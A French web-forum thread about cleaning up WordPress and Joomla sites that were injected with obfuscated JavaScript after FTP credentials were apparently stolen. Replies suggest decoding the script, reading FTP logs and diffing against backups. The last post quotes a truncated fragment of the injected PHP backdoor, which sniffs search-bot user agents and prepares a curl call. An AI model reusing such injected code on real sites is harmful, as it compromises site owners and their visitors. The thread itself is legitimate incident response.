IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Sécurité Discussion :

virus ftp javascript


Sujet :

Sécurité

  1. #1
    Membre habitué
    Inscrit en
    Février 2007
    Messages
    156
    Détails du profil
    Informations forums :
    Inscription : Février 2007
    Messages : 156
    Points : 131
    Points
    131
    Par défaut virus ftp javascript
    Salut à tous,

    Suite à un virus sur un pc qui a récupérer les codes FTP certainement via le fichier XML de filezilla, j'ai plusieurs sites infectés par un script js crypté.

    Ce script était ajouté sur toutes les pages .HTML et .htm, j'ai donc changer les codes ftp et supprimer manuellement le code sur toutes les pages infectées.

    Ce sont des sites sur wordpress et joomla , sur wordpress une fois le code supprimé dans les pages html plus de soucis...
    Par contre sur joomla il y a toujours un code js qui est présent.

    Le code supprimé dans les pages html était de cette forme

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    <script>var s=new String().....</script>
    Le code qui apparait toujours sur joomla est de la forme :

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    <script>w=Window;aa....</script>
    Et il apparait tout en haut de la page, avant même le doctype...

    J'ai fait une recherche avec notepad++ dans tous les fichiers à la recherche de ce fameux code mais je n'ai rien trouvé...

    Quelqu'un à t'il une idée ? Comment savoir d'ou vient ce code ?

    Joomla charge des modules et des templates donc pas évident de remonter tout le code pour savoir qu'elles sont les pages chargées....

    Quand on affiche la source de la page, on voit bien ce code, y a t'il un module firefox ou autre qui permet de savoir de quelle page provient ce code ?

    Merci pour votre aide.

  2. #2
    Membre expérimenté Avatar de 10_GOTO_10
    Profil pro
    Inscrit en
    Juillet 2004
    Messages
    886
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Juillet 2004
    Messages : 886
    Points : 1 526
    Points
    1 526
    Par défaut
    Si c'est du code JavaScript, le mieux est de le décoder. En général le codage en question est juste un remplacement ou un codage relativement simple (HEXA, BASE64).
    Après, c'est plus facile de savoir d'où ça vient (il y a forcément un iframe, un lien ou un truc comme ça).
    Sinon avec FireFox et le plugin FireBug, on doit pouvoir le visualiser directement (mais ça veut aussi dire l'exécuter, à tes risques et périls).

  3. #3
    Membre actif
    Homme Profil pro
    Ingénieur sécurité
    Inscrit en
    Juillet 2007
    Messages
    193
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 37
    Localisation : France, Paris (Île de France)

    Informations professionnelles :
    Activité : Ingénieur sécurité
    Secteur : High Tech - Produits et services télécom et Internet

    Informations forums :
    Inscription : Juillet 2007
    Messages : 193
    Points : 274
    Points
    274
    Par défaut
    Bonjour,

    Citation Envoyé par eveilside Voir le message
    Suite à un virus sur un pc qui a récupérer les codes FTP certainement via le fichier XML de filezilla, j'ai plusieurs sites infectés par un script js crypté.

    Ce script était ajouté sur toutes les pages .HTML et .htm, j'ai donc changer les codes ftp et supprimer manuellement le code sur toutes les pages infectées.
    Pouvez-vous apporter des détails qui vous permettent de tirer ces conclusions ? Êtes-vous certain de ces différents points ?

    Si c'est le cas, afin de trouver ou la modification de code à été opéré, peut-être pourriez vous regarder les logs de votre serveur FTP afin de connaitre les fichiers qui ont été modifiés.
    De plus, vous avez certainement des backup d'avant l'infection, vous pourrez alors regarder la différence (par exemple avec diff) si un fichier à été modifié.

    Dans certain cas, rétablir les fichiers modifiés et supprimé les nouveaux pourrait-être une solution viable

  4. #4
    Membre habitué
    Inscrit en
    Février 2007
    Messages
    156
    Détails du profil
    Informations forums :
    Inscription : Février 2007
    Messages : 156
    Points : 131
    Points
    131
    Par défaut re
    Merci pour vos réponses,

    Et oui ELBORAS, c'est bien de cette façon qu'ont été ajoutés les scripts.

    Donc ce matin jai fait un winmerg sur la version en ligne et la version locale que j'avais (chose qui ne m'était pas venue à l'esprit hier, comme quoi la nuit porte conseil ) et j'ai retrouvé la partie de code qui avait été ajoutée.

    Donc tout les fichiers html avait un script ajouté que j'avais déjà trouvé, par contre le code que je ne retrouvé pas était un code php qui affichait un code javascript d'ou le probleme...

    Un code du style :

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    
    <?
    
    if (!isset($sRetry))
    
    {
    
    global $sRetry;
    
    $sRetry = 1;
    
        // This code use for global bot statistic
    
        $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    
        $stCurlHandle = NULL;
    
        $stCurlLink = "";
    
        if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)
    Pour ceux que ça interesse. Voilà, merci quand même pour vos réponses !! Et bonne année !!

+ Répondre à la discussion
Cette discussion est résolue.

Discussions similaires

  1. Virus Javascript sur mon site
    Par Fanel dans le forum Général JavaScript
    Réponses: 8
    Dernier message: 02/01/2012, 11h55
  2. Virus eval(base64_decode( et recherche de string sur ftp
    Par Chricrix dans le forum Sécurité
    Réponses: 0
    Dernier message: 17/10/2010, 19h49
  3. Es-ce que Javascript peux faire FTP
    Par pierrot10 dans le forum Général JavaScript
    Réponses: 4
    Dernier message: 09/06/2007, 23h19
  4. Transfert FTP en javascript
    Par calitom dans le forum Général JavaScript
    Réponses: 2
    Dernier message: 02/03/2007, 18h39
  5. Problème de transfert FTP sous IIS
    Par thanathz dans le forum Développement
    Réponses: 2
    Dernier message: 12/07/2002, 15h27

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo